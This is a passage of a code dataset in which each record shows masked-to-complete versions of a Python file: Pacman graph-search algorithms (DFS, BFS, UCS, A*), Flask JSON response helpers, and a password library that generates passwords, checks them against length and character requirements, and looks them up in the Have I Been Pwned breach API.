visitedStates = []\n frontier.push((problem.getStartState(), []))\n while not frontier.isEmpty():\n currentState, pathTaken = frontier.pop()\n if currentState in visitedStates:\n continue\n if problem.isGoalState(currentState):\n return pathTaken\n visitedStates.append(currentState)\n for coordinates, direction, cost in problem.getSuccessors(currentState\n ):\n if coordinates not in visitedStates:\n frontier.push((coordinates, pathTaken + [direction]))\n util.raiseNotDefined()\n\n\ndef breadthFirstSearch(problem):\n \"\"\"\n Search the shallowest nodes in the search tree first.\n \"\"\"\n \"\"\"*** YOUR CODE HERE ***\"\"\"\n frontier = util.Queue()\n visitedStates = []\n frontier.push((problem.getStartState(), []))\n while not frontier.isEmpty():\n currentState, pathTaken = frontier.pop()\n if currentState in visitedStates:\n continue\n if problem.isGoalState(currentState):\n return pathTaken\n visitedStates.append(currentState)\n for coordinates, direction, cost in problem.getSuccessors(currentState\n ):\n if coordinates not in visitedStates:\n frontier.push((coordinates, pathTaken + [direction]))\n util.raiseNotDefined()\n\n\ndef uniformCostSearch(problem):\n \"\"\"Search the node of least total cost first. 
\"\"\"\n \"\"\"*** YOUR CODE HERE ***\"\"\"\n frontier = util.PriorityQueue()\n visitedStates = []\n frontier.push((problem.getStartState(), []), 0)\n while not frontier.isEmpty():\n currentState, pathTaken = frontier.pop()\n if currentState in visitedStates:\n continue\n if problem.isGoalState(currentState):\n return pathTaken\n visitedStates.append(currentState)\n for coordinates, direction, cost in problem.getSuccessors(currentState\n ):\n if coordinates not in visitedStates:\n newCost = problem.getCostOfActions(pathTaken + [direction])\n frontier.push((coordinates, pathTaken + [direction]), newCost)\n util.raiseNotDefined()\n\n\ndef nullHeuristic(state, problem=None):\n \"\"\"\n A heuristic function estimates the cost from the current state to the nearest\n goal in the provided SearchProblem. This heuristic is trivial.\n \"\"\"\n return 0\n\n\ndef aStarSearch(problem, heuristic=nullHeuristic):\n \"\"\"Search the node that has the lowest combined cost and heuristic first.\"\"\"\n \"\"\"*** YOUR CODE HERE ***\"\"\"\n frontier = util.PriorityQueue()\n visitedStates = []\n frontier.push((problem.getStartState(), []), heuristic(problem.\n getStartState(), problem))\n while not frontier.isEmpty():\n currentState, pathTaken = frontier.pop()\n if currentState in visitedStates:\n continue\n if problem.isGoalState(currentState):\n return pathTaken\n visitedStates.append(currentState)\n for coordinates, direction, cost in problem.getSuccessors(currentState\n ):\n if coordinates not in visitedStates:\n newCost = problem.getCostOfActions(pathTaken + [direction]\n ) + heuristic(coordinates, problem)\n frontier.push((coordinates, pathTaken + [direction]), newCost)\n util.raiseNotDefined()\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass SearchProblem:\n \"\"\"\n This class outlines the structure of a search problem, but doesn't implement\n any of the methods (in object-oriented terminology: an abstract class).\n\n You do not need to change anything in this class, ever.\n \"\"\"\n\n def getStartState(self):\n \"\"\"\n Returns the start state for the search problem\n \"\"\"\n util.raiseNotDefined()\n\n def isGoalState(self, state):\n \"\"\"\n state: Search state\n\n Returns True if and only if the state is a valid goal state\n \"\"\"\n util.raiseNotDefined()\n\n def getSuccessors(self, state):\n \"\"\"\n state: Search state\n\n For a given state, this should return a list of triples,\n (successor, action, stepCost), where 'successor' is a\n successor to the current state, 'action' is the action\n required to get there, and 'stepCost' is the incremental\n cost of expanding to that successor\n \"\"\"\n util.raiseNotDefined()\n\n def getCostOfActions(self, actions):\n \"\"\"\n actions: A list of actions to take\n\n This method returns the total cost of a particular sequence of actions. The sequence must\n be composed of legal moves\n \"\"\"\n util.raiseNotDefined()\n\n\ndef tinyMazeSearch(problem):\n \"\"\"\n Returns a sequence of moves that solves tinyMaze. For any other\n maze, the sequence of moves will be incorrect, so only use this for tinyMaze\n \"\"\"\n from game import Directions\n s = Directions.SOUTH\n w = Directions.WEST\n return [s, s, w, s, w, w, s, w]\n\n\ndef depthFirstSearch(problem):\n \"\"\"\n Search the deepest nodes in the search tree first\n\n Your search algorithm needs to return a list of actions that reaches\n the goal. Make sure to implement a graph search algorithm\n\n To get started, you might want to try some of these simple commands to\n understand the search problem that is being passed in:\n\n print(\"Start:\", problem.getStartState())\n print(\"Is the start a goal?\", problem.isGoalState(problem.getStartState()))\n print(\"Start's successors:\", problem.getSuccessors(problem.getStartState()))\n \"\"\"\n \"\"\"*** YOUR CODE HERE ***\"\"\"\n frontier = util.Stack()\n visitedStates = []\n frontier.push((problem.getStartState(), []))\n while not frontier.isEmpty():\n currentState, pathTaken = frontier.pop()\n if currentState in visitedStates:\n continue\n if problem.isGoalState(currentState):\n return pathTaken\n visitedStates.append(currentState)\n for coordinates, direction, cost in problem.getSuccessors(currentState\n ):\n if coordinates not in visitedStates:\n frontier.push((coordinates, pathTaken + [direction]))\n util.raiseNotDefined()\n\n\ndef breadthFirstSearch(problem):\n \"\"\"\n Search the shallowest nodes in the search tree first.\n \"\"\"\n \"\"\"*** YOUR CODE HERE ***\"\"\"\n frontier = util.Queue()\n visitedStates = []\n frontier.push((problem.getStartState(), []))\n while not frontier.isEmpty():\n currentState, pathTaken = frontier.pop()\n if currentState in visitedStates:\n continue\n if problem.isGoalState(currentState):\n return pathTaken\n visitedStates.append(currentState)\n for coordinates, direction, cost in problem.getSuccessors(currentState\n ):\n if coordinates not in visitedStates:\n frontier.push((coordinates, pathTaken + [direction]))\n util.raiseNotDefined()\n\n\ndef uniformCostSearch(problem):\n \"\"\"Search the node of least total cost first. 
\"\"\"\n \"\"\"*** YOUR CODE HERE ***\"\"\"\n frontier = util.PriorityQueue()\n visitedStates = []\n frontier.push((problem.getStartState(), []), 0)\n while not frontier.isEmpty():\n currentState, pathTaken = frontier.pop()\n if currentState in visitedStates:\n continue\n if problem.isGoalState(currentState):\n return pathTaken\n visitedStates.append(currentState)\n for coordinates, direction, cost in problem.getSuccessors(currentState\n ):\n if coordinates not in visitedStates:\n newCost = problem.getCostOfActions(pathTaken + [direction])\n frontier.push((coordinates, pathTaken + [direction]), newCost)\n util.raiseNotDefined()\n\n\ndef nullHeuristic(state, problem=None):\n \"\"\"\n A heuristic function estimates the cost from the current state to the nearest\n goal in the provided SearchProblem. This heuristic is trivial.\n \"\"\"\n return 0\n\n\ndef aStarSearch(problem, heuristic=nullHeuristic):\n \"\"\"Search the node that has the lowest combined cost and heuristic first.\"\"\"\n \"\"\"*** YOUR CODE HERE ***\"\"\"\n frontier = util.PriorityQueue()\n visitedStates = []\n frontier.push((problem.getStartState(), []), heuristic(problem.\n getStartState(), problem))\n while not frontier.isEmpty():\n currentState, pathTaken = frontier.pop()\n if currentState in visitedStates:\n continue\n if problem.isGoalState(currentState):\n return pathTaken\n visitedStates.append(currentState)\n for coordinates, direction, cost in problem.getSuccessors(currentState\n ):\n if coordinates not in visitedStates:\n newCost = problem.getCostOfActions(pathTaken + [direction]\n ) + heuristic(coordinates, problem)\n frontier.push((coordinates, pathTaken + [direction]), newCost)\n util.raiseNotDefined()\n\n\nbfs = breadthFirstSearch\ndfs = depthFirstSearch\nastar = aStarSearch\nucs = uniformCostSearch\n",
"step-5": "\"\"\"\nIn search.py, you will implement generic search algorithms which are called\nby Pacman agents (in searchAgents.py).\n\"\"\"\n\nimport util\n\nclass SearchProblem:\n \"\"\"\n This class outlines the structure of a search problem, but doesn't implement\n any of the methods (in object-oriented terminology: an abstract class).\n\n You do not need to change anything in this class, ever.\n \"\"\"\n\n def getStartState(self):\n \"\"\"\n Returns the start state for the search problem\n \"\"\"\n util.raiseNotDefined()\n\n def isGoalState(self, state):\n \"\"\"\n state: Search state\n\n Returns True if and only if the state is a valid goal state\n \"\"\"\n util.raiseNotDefined()\n\n def getSuccessors(self, state):\n \"\"\"\n state: Search state\n\n For a given state, this should return a list of triples,\n (successor, action, stepCost), where 'successor' is a\n successor to the current state, 'action' is the action\n required to get there, and 'stepCost' is the incremental\n cost of expanding to that successor\n \"\"\"\n util.raiseNotDefined()\n\n def getCostOfActions(self, actions):\n \"\"\"\n actions: A list of actions to take\n\n This method returns the total cost of a particular sequence of actions. The sequence must\n be composed of legal moves\n \"\"\"\n util.raiseNotDefined()\n\ndef tinyMazeSearch(problem):\n \"\"\"\n Returns a sequence of moves that solves tinyMaze. For any other\n maze, the sequence of moves will be incorrect, so only use this for tinyMaze\n \"\"\"\n from game import Directions\n s = Directions.SOUTH\n w = Directions.WEST\n return [s,s,w,s,w,w,s,w]\n\ndef depthFirstSearch(problem):\n \"\"\"\n Search the deepest nodes in the search tree first\n\n Your search algorithm needs to return a list of actions that reaches\n the goal. Make sure to implement a graph search algorithm\n\n To get started, you might want to try some of these simple commands to\n understand the search problem that is being passed in:\n\n print(\"Start:\", problem.getStartState())\n print(\"Is the start a goal?\", problem.isGoalState(problem.getStartState()))\n print(\"Start's successors:\", problem.getSuccessors(problem.getStartState()))\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n\n # Frontier stored in a Stack\n frontier = util.Stack()\n\n # Visited states stored in a list\n visitedStates = []\n\n # Format of each element: (current coordinates, [path taken to get there]) \n frontier.push((problem.getStartState(), []))\n\n # while there are still states to explore\n while not frontier.isEmpty():\n \n # store the current state and path in separate variables\n currentState, pathTaken = frontier.pop()\n\n # for skipping states that have already been visited\n if currentState in visitedStates:\n continue\n\n # for returning the correct path to the goal state upon discovering it\n if problem.isGoalState(currentState):\n return pathTaken\n\n # count the current state as \"visited\"\n visitedStates.append(currentState)\n\n # for each successor state, check whether they have already been visited. 
if not, add their coordinates to the frontier, and append their respective direction to the path list\n for coordinates, direction, cost in problem.getSuccessors(currentState):\n\n if coordinates not in visitedStates:\n \n frontier.push((coordinates, pathTaken + [direction]))\n\n\n util.raiseNotDefined()\n\ndef breadthFirstSearch(problem):\n \"\"\"\n Search the shallowest nodes in the search tree first.\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n\n # BFS is identical to DFS, save for the data structure used to store the frontier\n\n # Frontier stored in a Queue\n frontier = util.Queue()\n\n # Visited states stored in a list\n visitedStates = []\n\n # Format of each element: (current coordinates, [path taken to get there])\n frontier.push((problem.getStartState(), []))\n\n # while there are still states to explore\n while not frontier.isEmpty():\n\n # store the current state and path in separate variables\n currentState, pathTaken = frontier.pop()\n\n # for skipping states that have already been visited\n if currentState in visitedStates:\n continue\n\n # for returning the correct path to the goal state upon discovering it\n if problem.isGoalState(currentState):\n return pathTaken\n\n # count the current state as \"visited\"\n visitedStates.append(currentState)\n\n # for each successor state, check whether they have already been visited. if not, add their coordinates to the frontier, and append their respective direction to the path list\n for coordinates, direction, cost in problem.getSuccessors(currentState):\n\n if coordinates not in visitedStates:\n\n frontier.push((coordinates, pathTaken + [direction]))\n\n util.raiseNotDefined()\n\ndef uniformCostSearch(problem):\n \"Search the node of least total cost first. \"\n \"*** YOUR CODE HERE ***\"\n\n #UCS is similar to DFS and BFS, save for a few key differences\n\n # Frontier stored in a Priority Queue\n frontier = util.PriorityQueue()\n\n # Visited states stored in a list\n visitedStates = []\n\n # Format of each element: ((current coordinates, [path taken to get there]), cost)\n frontier.push((problem.getStartState(), []), 0)\n\n # while there are still states to explore\n while not frontier.isEmpty():\n\n # store the current state and path in separate variables\n currentState, pathTaken = frontier.pop()\n\n # for skipping states that have already been visited\n if currentState in visitedStates:\n continue\n\n # for returning the correct path to the goal state upon discovering it\n if problem.isGoalState(currentState):\n return pathTaken\n\n # count the current state as \"visited\"\n visitedStates.append(currentState)\n\n # for each successor state, check whether they have already been visited. \n \n for coordinates, direction, cost in problem.getSuccessors(currentState):\n\n if coordinates not in visitedStates:\n # if not, re-calculate the cost to reach the given coordinates, and push the updated information to the frontier\n newCost = problem.getCostOfActions(pathTaken + [direction])\n\n frontier.push((coordinates, pathTaken + [direction]), newCost)\n\n util.raiseNotDefined()\n\ndef nullHeuristic(state, problem=None):\n \"\"\"\n A heuristic function estimates the cost from the current state to the nearest\n goal in the provided SearchProblem. 
This heuristic is trivial.\n \"\"\"\n return 0\n\ndef aStarSearch(problem, heuristic=nullHeuristic):\n \"Search the node that has the lowest combined cost and heuristic first.\"\n \"*** YOUR CODE HERE ***\"\n\n # A* is different in that the heuristic argument provided is included in some parts\n\n # Frontier stored in a Priority Queue\n frontier = util.PriorityQueue()\n\n # Visited states stored in a list\n visitedStates = []\n\n # Format of each element: ((current coordinates, [path taken to get there]), heuristic function)\n frontier.push((problem.getStartState(), []), heuristic(problem.getStartState(), problem))\n\n # while there are still states to explore\n while not frontier.isEmpty():\n\n # store the current state and path in separate variables\n currentState, pathTaken = frontier.pop()\n\n # for skipping states that have already been visited\n if currentState in visitedStates:\n continue\n\n # for returning the correct path to the goal state upon discovering it\n if problem.isGoalState(currentState):\n return pathTaken\n\n # count the current state as \"visited\"\n visitedStates.append(currentState)\n\n # for each successor state, check whether they have already been visited.\n for coordinates, direction, cost in problem.getSuccessors(currentState):\n\n if coordinates not in visitedStates:\n # if not, re-calculate the cost to reach the given coordinates, and push the updated information to the frontier. Here, unlike UCS, the heuristic function is added to the newCost variable\n newCost = problem.getCostOfActions(pathTaken + [direction]) + heuristic(coordinates, problem)\n\n frontier.push((coordinates, pathTaken + [direction]), newCost)\n\n util.raiseNotDefined()\n\n# Abbreviations\nbfs = breadthFirstSearch\ndfs = depthFirstSearch\nastar = aStarSearch\nucs = uniformCostSearch\n",
"step-ids": [
8,
10,
12,
13,
15
]
}
|
[
8,
10,
12,
13,
15
] |
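Every solver in the row above reuses one pattern: a frontier of (state, path-taken) pairs in which only the pop order changes between DFS, BFS, UCS and A*. A minimal, self-contained sketch of that pattern on a toy graph (the graph, helper names and lambda goals below are illustrative, not part of the Pacman codebase):

def graph_search(start, is_goal, successors, frontier_pop):
    # frontier holds (state, path-so-far) pairs; the pop order picks the strategy
    frontier = [(start, [])]
    visited = []
    while frontier:
        state, path = frontier_pop(frontier)
        if state in visited:
            continue
        if is_goal(state):
            return path
        visited.append(state)
        for nxt, action, _cost in successors(state):
            if nxt not in visited:
                frontier.append((nxt, path + [action]))
    return None

toy = {'A': [('B', 'A->B', 1), ('C', 'A->C', 1)],
       'B': [('D', 'B->D', 1)], 'C': [('D', 'C->D', 1)], 'D': []}
print(graph_search('A', lambda s: s == 'D', toy.get, lambda f: f.pop()))   # LIFO pop -> DFS order
print(graph_search('A', lambda s: s == 'D', toy.get, lambda f: f.pop(0)))  # FIFO pop -> BFS order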
<|reserved_special_token_0|>
def _render(resp):
response = make_response(jsonify(resp))
return response
<|reserved_special_token_0|>
def json_detail_render(code, data=[], message=None):
if message is None:
message = STATUS_CODE.get(code)
resp = dict(code=code, message=message, data=data)
return _render(resp)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def _render(resp):
response = make_response(jsonify(resp))
return response
def json_list_render(code, data, limit, offset, message=None):
if message is None:
message = STATUS_CODE.get(code)
resp = dict(code=code, limit=limit, offset=offset, message=message,
data=data)
return _render(resp)
def json_detail_render(code, data=[], message=None):
if message is None:
message = STATUS_CODE.get(code)
resp = dict(code=code, message=message, data=data)
return _render(resp)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def _render(resp):
response = make_response(jsonify(resp))
return response
def json_list_render(code, data, limit, offset, message=None):
if message is None:
message = STATUS_CODE.get(code)
resp = dict(code=code, limit=limit, offset=offset, message=message,
data=data)
return _render(resp)
def json_detail_render(code, data=[], message=None):
if message is None:
message = STATUS_CODE.get(code)
resp = dict(code=code, message=message, data=data)
return _render(resp)
def json_token_render(code, token, message=None):
if message is None:
message = STATUS_CODE.get(code)
resp = dict(code=code, token=token, message=message)
return _render(resp)
def json_detail_render_sse(code, data=[], message=None):
if message is None:
message = STATUS_CODE.get(code)
resp = dict(code=code, message=message, data=data)
return json.dumps(resp)
<|reserved_special_token_1|>
import json
from flask import jsonify
from flask import make_response
from MultipleInterfaceManager.settings import STATUS_CODE
def _render(resp):
response = make_response(jsonify(resp))
return response
def json_list_render(code, data, limit, offset, message=None):
if message is None:
message = STATUS_CODE.get(code)
resp = dict(code=code, limit=limit, offset=offset, message=message,
data=data)
return _render(resp)
def json_detail_render(code, data=[], message=None):
if message is None:
message = STATUS_CODE.get(code)
resp = dict(code=code, message=message, data=data)
return _render(resp)
def json_token_render(code, token, message=None):
if message is None:
message = STATUS_CODE.get(code)
resp = dict(code=code, token=token, message=message)
return _render(resp)
def json_detail_render_sse(code, data=[], message=None):
if message is None:
message = STATUS_CODE.get(code)
resp = dict(code=code, message=message, data=data)
return json.dumps(resp)
<|reserved_special_token_1|>
#!/usr/bin/python
# -*- coding: utf-8 -*-
import json
from flask import jsonify
from flask import make_response
from MultipleInterfaceManager.settings import STATUS_CODE
def _render(resp):
response = make_response(jsonify(resp))
# response.headers["Access-Control-Allow-Origin"] = "*"
return response
def json_list_render(code, data, limit, offset, message = None):
if message is None:
message = STATUS_CODE.get(code)
resp = dict(
code = code,
limit = limit,
offset = offset,
message = message,
data = data
)
return _render(resp)
def json_detail_render(code, data = [], message = None):
if message is None:
message = STATUS_CODE.get(code)
resp = dict(
code = code,
message = message,
data = data
)
return _render(resp)
def json_token_render(code, token, message = None):
if message is None:
message = STATUS_CODE.get(code)
resp = dict(
code = code,
token = token,
message = message
)
return _render(resp)
def json_detail_render_sse(code, data = [], message = None):
if message is None:
message = STATUS_CODE.get(code)
resp = dict(code=code, message=message, data=data)
return json.dumps(resp)
|
flexible
|
{
"blob_id": "a87ab07bb1502a75a7e705cd5c92db829ebdd966",
"index": 8689,
"step-1": "<mask token>\n\n\ndef _render(resp):\n response = make_response(jsonify(resp))\n return response\n\n\n<mask token>\n\n\ndef json_detail_render(code, data=[], message=None):\n if message is None:\n message = STATUS_CODE.get(code)\n resp = dict(code=code, message=message, data=data)\n return _render(resp)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef _render(resp):\n response = make_response(jsonify(resp))\n return response\n\n\ndef json_list_render(code, data, limit, offset, message=None):\n if message is None:\n message = STATUS_CODE.get(code)\n resp = dict(code=code, limit=limit, offset=offset, message=message,\n data=data)\n return _render(resp)\n\n\ndef json_detail_render(code, data=[], message=None):\n if message is None:\n message = STATUS_CODE.get(code)\n resp = dict(code=code, message=message, data=data)\n return _render(resp)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef _render(resp):\n response = make_response(jsonify(resp))\n return response\n\n\ndef json_list_render(code, data, limit, offset, message=None):\n if message is None:\n message = STATUS_CODE.get(code)\n resp = dict(code=code, limit=limit, offset=offset, message=message,\n data=data)\n return _render(resp)\n\n\ndef json_detail_render(code, data=[], message=None):\n if message is None:\n message = STATUS_CODE.get(code)\n resp = dict(code=code, message=message, data=data)\n return _render(resp)\n\n\ndef json_token_render(code, token, message=None):\n if message is None:\n message = STATUS_CODE.get(code)\n resp = dict(code=code, token=token, message=message)\n return _render(resp)\n\n\ndef json_detail_render_sse(code, data=[], message=None):\n if message is None:\n message = STATUS_CODE.get(code)\n resp = dict(code=code, message=message, data=data)\n return json.dumps(resp)\n",
"step-4": "import json\nfrom flask import jsonify\nfrom flask import make_response\nfrom MultipleInterfaceManager.settings import STATUS_CODE\n\n\ndef _render(resp):\n response = make_response(jsonify(resp))\n return response\n\n\ndef json_list_render(code, data, limit, offset, message=None):\n if message is None:\n message = STATUS_CODE.get(code)\n resp = dict(code=code, limit=limit, offset=offset, message=message,\n data=data)\n return _render(resp)\n\n\ndef json_detail_render(code, data=[], message=None):\n if message is None:\n message = STATUS_CODE.get(code)\n resp = dict(code=code, message=message, data=data)\n return _render(resp)\n\n\ndef json_token_render(code, token, message=None):\n if message is None:\n message = STATUS_CODE.get(code)\n resp = dict(code=code, token=token, message=message)\n return _render(resp)\n\n\ndef json_detail_render_sse(code, data=[], message=None):\n if message is None:\n message = STATUS_CODE.get(code)\n resp = dict(code=code, message=message, data=data)\n return json.dumps(resp)\n",
"step-5": "#!/usr/bin/python\r\n# -*- coding: utf-8 -*-\r\n\r\nimport json\r\n\r\nfrom flask import jsonify\r\nfrom flask import make_response\r\nfrom MultipleInterfaceManager.settings import STATUS_CODE\r\n\r\n\r\ndef _render(resp):\r\n response = make_response(jsonify(resp))\r\n# response.headers[\"Access-Control-Allow-Origin\"] = \"*\"\r\n return response\r\n\r\n\r\n\r\ndef json_list_render(code, data, limit, offset, message = None):\r\n if message is None:\r\n message = STATUS_CODE.get(code)\r\n resp = dict(\r\n code = code,\r\n limit = limit,\r\n offset = offset,\r\n message = message,\r\n data = data\r\n )\r\n return _render(resp)\r\n\r\n\r\n\r\ndef json_detail_render(code, data = [], message = None):\r\n if message is None:\r\n message = STATUS_CODE.get(code)\r\n resp = dict(\r\n code = code,\r\n message = message,\r\n data = data\r\n )\r\n return _render(resp)\r\n\r\n\r\ndef json_token_render(code, token, message = None):\r\n if message is None:\r\n message = STATUS_CODE.get(code)\r\n resp = dict(\r\n code = code,\r\n token = token,\r\n message = message\r\n )\r\n return _render(resp)\r\n\r\ndef json_detail_render_sse(code, data = [], message = None):\r\n if message is None:\r\n message = STATUS_CODE.get(code)\r\n resp = dict(code=code, message=message, data=data)\r\n return json.dumps(resp)\r\n",
"step-ids": [
2,
3,
5,
6,
7
]
}
|
[
2,
3,
5,
6,
7
] |
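A hedged usage sketch for the render helpers in the row above: Flask's jsonify/make_response require an application context, and STATUS_CODE is assumed here to be a plain int-to-message dict standing in for MultipleInterfaceManager.settings, which the sample does not show:

from flask import Flask, jsonify, make_response

STATUS_CODE = {0: 'ok', 101: 'invalid token'}  # assumed stand-in for settings.STATUS_CODE

def _render(resp):
    return make_response(jsonify(resp))

def json_detail_render(code, data=[], message=None):
    if message is None:
        message = STATUS_CODE.get(code)
    return _render(dict(code=code, message=message, data=data))

app = Flask(__name__)

@app.route('/ping')
def ping():
    return json_detail_render(0, data=[{'pong': True}])

# app.test_client().get('/ping').get_json() -> {'code': 0, 'data': [{'pong': True}], 'message': 'ok'}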
__version__ = "1.2.0"
import hashlib
from collections import Counter
from re import findall
from secrets import choice
from string import ascii_letters, ascii_lowercase, ascii_uppercase
from string import digits as all_digits
from string import punctuation
import requests
def check_password(password):
"""Check a given password against known data breaches
Note:
This method uses the `Have I Been Pwned <https://haveibeenpwned.com/>`_ Passwords API. The unhashed password nor its full `SHA-1 <https://en.wikipedia.org/wiki/SHA-1>`_ hash never leave the device.
Args:
password (str): The password to check
Returns:
int: The number of times the password has been found
"""
sha1 = hashlib.sha1(password.encode("utf-8")).hexdigest()
response = requests.get(f"https://api.pwnedpasswords.com/range/{sha1[:5]}")
hash_suffix_list = [x.split(":") for x in response.text.splitlines(False)]
try:
count = [
count for suffix, count in hash_suffix_list if sha1.endswith(suffix.lower())
][0]
except IndexError:
return 0
return int(count)
class PasswordRequirements:
"""A set of requirements to check passwords against
Keyword Args:
min_length (int): The minimum length of the password
min_digits (int): The minimum number of digits in the password
min_special (int): The minimum number of special characters in the password
min_alpha (int): The minimum number of alphabetical characters in the password
min_upper (int): The minimum number of uppercase letters in the password
min_lower (int): The minimum number of lowercase letters in the password
check_breaches (bool): Whether to ensure that passwords aren't found in known data breaches (uses :meth:`~passwd.check_password`)
func (function): A function that takes in a password (:class:`str`) and returns a :class:`bool` that must be ``True`` for the password to meet all requirements
"""
def __init__(
self,
*,
min_length=0,
min_digits=0,
min_special=0,
min_alpha=0,
min_upper=0,
min_lower=0,
check_breaches=False,
func=None,
):
self.min_length = min_length
self.min_digits = min_digits
self.min_special = min_special
self.min_alpha = min_alpha
self.min_upper = min_upper
self.min_lower = min_lower
self.check_breaches = check_breaches
self.func = func
def check(self, password):
"""Check a password against the requirements
Args:
password (str): The password to check
Returns:
bool: Whether the password meets all the given requirements
"""
if len(password) < self.min_length:
return False
digits = len(findall(r"\d", password))
if digits < self.min_digits:
return False
special_chars = sum(v for k, v in Counter(password).items() if k in punctuation)
if special_chars < self.min_special:
return False
alpha_chars = sum(v for k, v in Counter(password).items() if k in ascii_letters)
if alpha_chars < self.min_alpha:
return False
upper_chars = sum(
v for k, v in Counter(password).items() if k in ascii_uppercase
)
if upper_chars < self.min_upper:
return False
lower_chars = sum(
v for k, v in Counter(password).items() if k in ascii_lowercase
)
if lower_chars < self.min_lower:
return False
if self.check_breaches and check_password(password):
return False
if self.func and not self.func(password):
return False
return True
class PasswordGenerator:
"""A random password generator
Args:
length (int): The length of the password
Keyword Args:
uppercase (bool): Whether to allow uppercase letters in the password
lowercase (bool): Whether to allow lowercase letters in the password
digits (bool): Whether to allow numerical digits in the password
special (bool): Whether to allow special characters in the password
"""
def __init__(
self, length, *, uppercase=True, lowercase=True, digits=True, special=True
):
self.length = length
self.uppercase = uppercase
self.lowercase = lowercase
self.digits = digits
self.special = special
def generate(
self, length=None, uppercase=None, lowercase=None, digits=None, special=None
):
"""Generate a random password
Keyword Args:
length (int): The length of the password
uppercase (bool): Whether to allow uppercase letters in the password
lowercase (bool): Whether to allow lowercase letters in the password
digits (bool): Whether to allow numerical digits in the password
special (bool): Whether to allow special characters in the password
Returns:
str: The freshly generated password
"""
if length is None:
length = self.length
allowed_chars = ""
if uppercase is not None:
allowed_chars += ascii_uppercase if uppercase else ""
elif self.uppercase:
allowed_chars += ascii_uppercase
if lowercase is not None:
allowed_chars += ascii_lowercase if lowercase else ""
elif self.lowercase:
allowed_chars += ascii_lowercase
if digits is not None:
allowed_chars += all_digits if digits else ""
elif self.digits:
allowed_chars += all_digits
if special is not None:
allowed_chars += punctuation if special else ""
elif self.special:
allowed_chars += punctuation
return "".join(choice(allowed_chars) for _ in range(length))
def __len__(self):
return self.length if self.length >= 0 else 0
|
normal
|
{
"blob_id": "eafe89de10c4187057b0cc1e0e9772f03a576b0d",
"index": 9771,
"step-1": "<mask token>\n\n\nclass PasswordGenerator:\n <mask token>\n\n def __init__(self, length, *, uppercase=True, lowercase=True, digits=\n True, special=True):\n self.length = length\n self.uppercase = uppercase\n self.lowercase = lowercase\n self.digits = digits\n self.special = special\n\n def generate(self, length=None, uppercase=None, lowercase=None, digits=\n None, special=None):\n \"\"\"Generate a random password\n\n Keyword Args:\n length (int): The length of the password\n uppercase (bool): Whether to allow uppercase letters in the password\n lowercase (bool): Whether to allow lowercase letters in the password\n digits (bool): Whether to allow numerical digits in the password\n special (bool): Whether to allow special characters in the password\n\n Returns:\n str: The freshly generated password\n \"\"\"\n if length is None:\n length = self.length\n allowed_chars = ''\n if uppercase is not None:\n allowed_chars += ascii_uppercase if uppercase else ''\n elif self.uppercase:\n allowed_chars += ascii_uppercase\n if lowercase is not None:\n allowed_chars += ascii_lowercase if lowercase else ''\n elif self.lowercase:\n allowed_chars += ascii_lowercase\n if digits is not None:\n allowed_chars += all_digits if digits else ''\n elif self.digits:\n allowed_chars += all_digits\n if special is not None:\n allowed_chars += punctuation if special else ''\n elif self.special:\n allowed_chars += punctuation\n return ''.join(choice(allowed_chars) for _ in range(length))\n\n def __len__(self):\n return self.length if self.length >= 0 else 0\n",
"step-2": "<mask token>\n\n\nclass PasswordRequirements:\n <mask token>\n <mask token>\n <mask token>\n\n\nclass PasswordGenerator:\n \"\"\"A random password generator\n\n Args:\n length (int): The length of the password\n\n Keyword Args:\n uppercase (bool): Whether to allow uppercase letters in the password\n lowercase (bool): Whether to allow lowercase letters in the password\n digits (bool): Whether to allow numerical digits in the password\n special (bool): Whether to allow special characters in the password\n \"\"\"\n\n def __init__(self, length, *, uppercase=True, lowercase=True, digits=\n True, special=True):\n self.length = length\n self.uppercase = uppercase\n self.lowercase = lowercase\n self.digits = digits\n self.special = special\n\n def generate(self, length=None, uppercase=None, lowercase=None, digits=\n None, special=None):\n \"\"\"Generate a random password\n\n Keyword Args:\n length (int): The length of the password\n uppercase (bool): Whether to allow uppercase letters in the password\n lowercase (bool): Whether to allow lowercase letters in the password\n digits (bool): Whether to allow numerical digits in the password\n special (bool): Whether to allow special characters in the password\n\n Returns:\n str: The freshly generated password\n \"\"\"\n if length is None:\n length = self.length\n allowed_chars = ''\n if uppercase is not None:\n allowed_chars += ascii_uppercase if uppercase else ''\n elif self.uppercase:\n allowed_chars += ascii_uppercase\n if lowercase is not None:\n allowed_chars += ascii_lowercase if lowercase else ''\n elif self.lowercase:\n allowed_chars += ascii_lowercase\n if digits is not None:\n allowed_chars += all_digits if digits else ''\n elif self.digits:\n allowed_chars += all_digits\n if special is not None:\n allowed_chars += punctuation if special else ''\n elif self.special:\n allowed_chars += punctuation\n return ''.join(choice(allowed_chars) for _ in range(length))\n\n def __len__(self):\n return self.length if self.length >= 0 else 0\n",
"step-3": "<mask token>\n\n\ndef check_password(password):\n \"\"\"Check a given password against known data breaches\n\n Note:\n This method uses the `Have I Been Pwned <https://haveibeenpwned.com/>`_ Passwords API. The unhashed password nor its full `SHA-1 <https://en.wikipedia.org/wiki/SHA-1>`_ hash never leave the device.\n\n Args:\n password (str): The password to check\n\n Returns:\n int: The number of times the password has been found\n \"\"\"\n sha1 = hashlib.sha1(password.encode('utf-8')).hexdigest()\n response = requests.get(f'https://api.pwnedpasswords.com/range/{sha1[:5]}')\n hash_suffix_list = [x.split(':') for x in response.text.splitlines(False)]\n try:\n count = [count for suffix, count in hash_suffix_list if sha1.\n endswith(suffix.lower())][0]\n except IndexError:\n return 0\n return int(count)\n\n\nclass PasswordRequirements:\n \"\"\"A set of requirements to check passwords against\n\n Keyword Args:\n min_length (int): The minimum length of the password\n min_digits (int): The minimum number of digits in the password\n min_special (int): The minimum number of special characters in the password\n min_alpha (int): The minimum number of alphabetical characters in the password\n min_upper (int): The minimum number of uppercase letters in the password\n min_lower (int): The minimum number of lowercase letters in the password\n check_breaches (bool): Whether to ensure that passwords aren't found in known data breaches (uses :meth:`~passwd.check_password`)\n func (function): A function that takes in a password (:class:`str`) and returns a :class:`bool` that must be ``True`` for the password to meet all requirements\n \"\"\"\n\n def __init__(self, *, min_length=0, min_digits=0, min_special=0,\n min_alpha=0, min_upper=0, 